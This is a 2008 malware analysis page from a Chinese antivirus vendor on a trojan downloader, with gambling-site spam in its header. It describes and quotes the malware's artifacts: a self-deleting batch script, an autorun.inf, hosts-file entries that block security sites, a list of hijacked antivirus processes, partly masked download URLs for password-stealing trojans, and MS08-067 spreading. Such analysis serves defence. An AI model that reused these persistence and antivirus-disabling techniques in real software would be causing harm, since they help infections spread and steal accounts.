东方微点-yb体育官方

  yb体育官方  
yb体育官方-yb亚博全站首页  |  微点新闻  |  业界动态  |  安全资讯  |   |   |  网络版yb亚博全站首页
 |   |   |   |   |   |  各地代理商
 

ns下载者trojan-downloader.win32.agent.akqb
来源:  2008-12-05 16:49:35



捕获时间

2008-12-5

病毒摘要

该样本是使用c语言编写的木马下载器,由微点主动防御软件自动捕获,未加壳,长度为“86,421 字节”,图标为,病毒扩展名为“exe”,主要通过“网页木马”、“局域网感染”、“漏洞利用”、“文件捆绑”等方式传播,病毒融合了机器狗、ms-08067漏洞溢出攻击以及av杀手的各项攻击技术特点,是一种新兴的综合型下载者,最终目的是下载大量各类木马至本地运行,实现各类网游盗号、设立后门等操作,使用户利益受到损害。



感染对象


windows 2000/windows xp/windows 2003

传播途径

网页木马、文件捆绑

防范措施

已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知间谍软件”,请直接选择删除处理(如图1);


          图1 主动防御自动捕获未知病毒(未升级)



如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"trojan-downloader.win32.agent.akqb”,请直接选择删除(如图2)。


          图2   升级后截获已知病毒



对于未使用微点主动防御软件的用户,微点反病毒专家建议
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取yb亚博全站首页的技术支持。
3、开启windows自动更新,及时打好漏洞补丁。

病毒分析

  该样本程序被执行后,首先将进行防调试判断,遍历ollyice.exe、ollydbg.exe、importrec.exe、c32asm.exe、lordpe.exe、peditor.exe等调试软件进程,若遍历获得,则停止一切操作,进程退出。
  成功执行后,样本将在系统文件夹“%temp%”下释放动态库文件“dll375.dll”,该动态库文件的命名特点是三位数字为随机,在“%systemroot%\system32”文件夹下释放驱动文件“nskhelper2.sys”,将“nskhelper2.sys”注册为名为“nsrk1”的服务,创建名为“\\.\nsrk1”的设备,相关注册表项如下:

  
  项:“hkey_local_machine\system\currentcontrolset\services\nsrk1”
  键:“type”
  数据:“service kernel driver”
  键:“start”
  数据:“service demand start”
  键:“imagepath”
  数据:“\??\c:\windows\system32\nskhelper2.sys”
  键:“displayname”
  数据:“nsrk1”


  启动“svchost.exe”,在其中划出一块内存空间,将“dll375.dll”注入其中,启动十余个线程共同操作。修改注册表,将下列安全及辅助工具进程映像劫持,指向“svchost.exe”。

  360safe.exe
  360safebox.exe
  360tray.exe
  ackwin32.exe
  anti-trojan.exe
  anti.exe
  antivir.exe
  apvxdwin.exe
  atrack.exe
  autodown.exe
  avconsol.exe
  ave32.exe
  avgctrl.exe
  avk.exe
  avkserv.exe
  avp.exe
  avpupd.exe
  avsched32.exe
  avsynmgr.exe
  avwin95.exe
  avxonsol.exe
  blackd.exe
  blackice.exe
  ccenter.exe
  cfiadmin.exe
  cfiaudit.exe
  cfind.exe
  cfinet.exe
  cfinet32.exe
  claw95.exe
  claw95ct.exe
  cleaner.exe
  cleaner3.exe
  davpfw.exe
  dbg.exe
  debu.exe
  dv95.exe
  dv95_o.exe
  dvp95.exe
  ecengine.exe
  efinet32.exe
  esafe.exe
  espwatch.exe
  explorewclass.exe
  f-agnt95.exe
  f-prot.exe
  f-prot95.exe
  f-stopw.exe
  findviru.exe
  fir.exe
  fp-win.exe
  frw.exe
  iamapp.exe
  iamserv.exe
  ibmasn.exe
  ibmavsp.exe
  ice.exe
  icesword.exe
  icload95.exe
  icloadnt.exe
  icmoon.exe
  icssuppnt.exe
  iom.exe
  iomon98.exe
  jed.exe
  kabackreport.exe
  kasmain.exe
  kav32.exe
  kavstart.exe
  kissvc.exe
  kpfw32.exe
  kpfwsvc.exe
  kppmain.exe
  krf.exe
  kvmonxp.exe
  kvprescan.exe
  kwatch.exe
  lamapp.exe
  lockdown2000.exe
  lookout.exe
  luall.exe
  lucomserver.exe
  mcafee.exe
  microsoft.exe
  mon.exe
  moniker.exe
  moolive.exe
  mpftray.exe
  ms.exe
  n32acan.exe
  navapsvc.exe
  navapw32.exe
  navlu32.exe
  navnt.exe
  navrunr.exe
  navsched.exe
  navw.exe
  navw32.exe
  navwnt.exe
  nisserv.exe
  nisum.exe
  nmain.exe
  normist.exe
  norton.exe
  nupgrade.exe
  nvc95.exe
  office.exe
  outpost.exe
  padmin.exe
  pavcl.exe
  pcc.exe
  pccclient.exe
  pccguide.exe
  pcciomon.exe
  pccmain.exe
  pccwin98.exe
  pcfwallicon.exe
  persfw.exe
  pop3trap.exe
  ppppwallrun.exe
  program.exe
  prot.exe
  pview95.exe
  ras.exe
  rav.exe
  rav7.exe
  rav7win.exe
  ravmon.exe
  ravmond.exe
  ravstub.exe
  ravtask.exe
  regedit.exe
  rescue32.exe
  rfw.exe
  rn.exe
  safeboxtray.exe
  safeweb.exe
  scam32.exe
  scan.exe
  scan32.exe
  scanpm.exe
  scon.exe
  scrscan.exe
  secu.exe
  serv95.exe
  sirc32.exe
  smc.exe
  smtpsvc.exe
  sphinx.exe
  spy.exe
  sweep95.exe
  symproxysvc.exe
  tbscan.exe
  tca.exe
  tds2-98.exe
  tds2-nt.exe
  tmntsrv.exe
  tmoagent.exe
  tmproxy.exe
  tmupdito.exe
  tsc.exe
  ulibcfg.exe
  vavrunr.exe
  vet95.exe
  vettray.exe
  vir.exe
  vpc32.exe
  vsecomr.exe
  vshwin32.exe
  vsscan40
  vsstat.exe
  webscan.exe
  webscanx.exe
  webtrap.exe
  wfindv32.exe
  windows优化大师.exe
  wink.exe
  zonealarm.exe

        生成随机名批处理文件“13578984.bat”,实现自删除,批处理如下:

  
  :repeat
  del /f "c:\documents and settings\administrator\桌面\4326236436.exe"
  if exist "c:\documents and settings\administrator\桌面\4326236436.exe" goto repeat
  del /f "c:\docume~1\admini~1\locals~1\temp\13578984.bat"


  驱动文件“nskhelper2.sys”加载后,将恢复系统ssdt表,使部分安全软件主动防御功能失效,并关闭指定杀毒软件进程。
  被注入后的“svchost.exe”将在各本地磁盘根目录生成“autorun.inf”配置文件与“dll375.dll”相同的数据文件“system.dll”,使用户打开磁盘后通过rundll32.exe加载“system.dll”;“autorun.inf”内容如下:

  
  [autorun]
shell\open\command=rundll32 system.dll,explore
shell\explore\command=rundll32 system.dll,explore


  修改“%systemroot%\system32\drivers\etc”文件夹下的“hosts”文件,将以下安全厂商站点指向“127.0.0.1”,host文件如下:

  127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 360.qihoo.com

  访问网络,下载“http://txt.**nb.com/update/count.txt”,存储至“%temp%”文件夹,重命名为随机文件名,读取文件列表,下载后运行,其中包含了大量盗号木马,文件列表如下:

  
  http://u3.www-s**cn.com/ly/a4.exe
http://u3.www-s**cn.com/ly/a1.exe
http://u3.www-s**cn.com/ly/a3.exe
http://u3.www-s**cn.com/ly/a10.exe
http://u3.www-s**cn.com/ly/a40.exe
http://u3.www-s**cn.com/ly/a25.exe
http://u3.www-s**cn.com/ly/a13.exe
http://u3.www-s**cn.com/ly/a36.exe
http://u3.www-s**cn.com/ly/a41.exe
http://u3.www-s**cn.com/ly/a9.exe
http://u3.www-s**cn.com/ly/a49.exe
http://u3.www-s**cn.com/ly/a23.exe
http://u3.www-s**cn.com/ly/a32.exe
http://u3.www-s**cn.com/ly/a42.exe
http://u1.www-s**cn.com/hm/b12.exe
http://u1.www-s**cn.com/hm/b17.exe
http://u1.www-s**cn.com/hm/b13.exe
http://u1.www-s**cn.com/hm/b35.exe
http://u1.www-s**cn.com/hm/b15.exe
http://u1.www-s**cn.com/hm/b7.exe
http://u1.www-s**cn.com/hm/b21.exe
http://u1.www-s**cn.com/hm/b16.exe
http://u1.www-s**cn.com/hm/b44.exe
http://u2.www-s**cn.com/hm/b3.exe
http://u2.www-s**cn.com/hm/b10.exe
http://u2.www-s**cn.com/hm/b5.exe
http://u2.www-s**cn.com/hm/b8.exe
http://u2.www-s**cn.com/hm/b2.exe
http://u2.www-s**cn.com/hm/b4.exe
http://u2.www-s**cn.com/hm/b11.exe
http://u2.www-s**cn.com/hm/b1.exe
http://u4.www-s**cn.com/bm/c1.exe
http://u4.www-s**cn.com/bm/c2.exe
http://u4.www-s**cn.com/vip/aaa.exe
http://u4.www-s**cn.com/vip/cj.exe


  连接网络,访问网络“http://count.r**luu.com/40/count.asp”,按照格式“mac=*&os=*&ver=*&temp=*&key=*”,上传本机网卡mac地址,操作系统及其版本等信息进行感染统计。
  在系统目录“%systemroot%\system32”生成“appwinproc.dll”, “appwinproc.dll”加载后,将进行辅助关闭安全软件进程的工作。
  根据机器狗读写物理磁盘原理,在“%systemroot%\system32\”文件夹下生成五个驱动文件“nspass0.sys”、“ nspass1.sys”、“ nspass2.sys”、“ nspass3.sys”、“ nspass4.sys”。分别针对“%systemroot%\system32\”文件夹下的“schedsvc.dll”、 “appmgmts.dll”、 “srsvc.dll”、 “w32time.dll”、 “wiaservc.dll”五个文件进行改写,在头部加入“dll375.dll”的代码,使以上文件相对应的系统服务 “task scheduler”、 “application management”、“system restore service”、 “windows time” 、“windows image acquisition ”启动时一同启动病毒。
  病毒还将尝试扫描本机网段内的其他机器,扫描成功后将在“%temp%”文件夹内生成一个随机文件名的动态库文件,使用“rundll32.exe”将其加载,利用近期爆出的“ms-08067”漏洞,尝试溢出局域网其他计算机,进行病毒传播。

免费体验
下  载

网站地图